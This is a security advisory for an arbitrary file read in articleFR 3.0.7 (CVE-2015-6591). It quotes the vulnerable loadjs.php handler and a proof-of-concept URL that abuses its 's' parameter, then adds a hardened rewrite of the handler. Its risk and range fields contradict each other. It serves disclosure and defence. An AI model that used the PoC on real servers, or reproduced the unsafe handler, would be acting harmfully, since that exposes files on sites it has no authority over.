articleFR 3.0.7 Arbitrary File Read

2015.10.27
Risk: High
Local: No
Remote: Yes
CWE: CWE-200


CVSS Base Score: 2.1/10
Impact Subscore: 2.9/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

# Exploit Title: articleFR any file read vulnerability in v3.0.7
# Date: 2015-09-06
# Vendor: Free Reprintables
# Exploit Author: cfreer & 0keeTeam
# Product web page: http://www.freereprintables.com
# Version: 3.0.7
# CVE : CVE-2015-6591

Details of the vulnerability are as follows:

Affected version: Version 3.0.7 and before.
Discover date: 2015/9/6
Tested on: Apache/2.4.7 (Win32)

===================================================

The vulnerable parameter is "s" (in articleFR\application\templates\amelia\loadjs.php). The "s" parameter is passed directly to the file_get_contents function.

<?
header('Content-Type: application/javascript');
$_content = file_get_contents($_GET['s']);
$_content = preg_replace('/(' . $_GET['h'] . ')/sim', $_GET['r'], $_content);
print $_content;
exit;
?>

Proof of Concept:
=================================================================================================
http://127.0.0.1/articleFR/application/templates/amelia/loadjs.php?h=cfreer&r=0keeTeam&s=loadjs.php
=================================================================================================

Reference: https://github.com/poc-lab/exp/blob/master/CVE-2015-6591

References:

https://github.com/poc-lab/exp/blob/master/CVE-2015-6591
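
A hardened form of the loadjs.php handler quoted above, as an added example rather than the vendor's fix or code from the advisory; the JS_DIR location and the function names resolve_script and render_script are assumptions. It confines "s" to .js files under one directory and treats "h" as literal text instead of a regular expression.

```php
<?php
// Added example (not vendor code): loadjs.php restricted to .js files in one directory.
declare(strict_types=1);

const JS_DIR = __DIR__ . '/js'; // assumption: directory holding the template's scripts

// Map a requested name to a real file inside $baseDir, or null if it is not allowed.
function resolve_script(string $name, string $baseDir): ?string
{
    // Bare file names ending in .js only: no separators, wrappers (php://) or null bytes.
    if (!preg_match('/\A[A-Za-z0-9_.-]+\.js\z/', $name)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false) {
        return null;
    }
    // realpath() resolves symlinks and "..", so the result must still sit under $base.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0 || !is_file($path)) {
        return null;
    }
    return $path;
}

// Build the response body from the query parameters, or null to refuse the request.
function render_script(array $query, string $baseDir): ?string
{
    $s = $query['s'] ?? null;
    $path = is_string($s) ? resolve_script($s, $baseDir) : null;
    $content = $path === null ? false : file_get_contents($path);
    if ($content === false) {
        return null;
    }
    [$h, $r] = [$query['h'] ?? '', $query['r'] ?? ''];
    if (is_string($h) && $h !== '' && is_string($r)) {
        // Literal, case-insensitive replacement; the request never supplies a regex.
        $content = str_ireplace($h, $r, $content);
    }
    return $content;
}

$body = render_script($_GET, JS_DIR);
if ($body === null) {
    http_response_code(404);
    exit;
}
header('Content-Type: application/javascript');
print $body;
```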


Copyright 2024, cxsecurity.com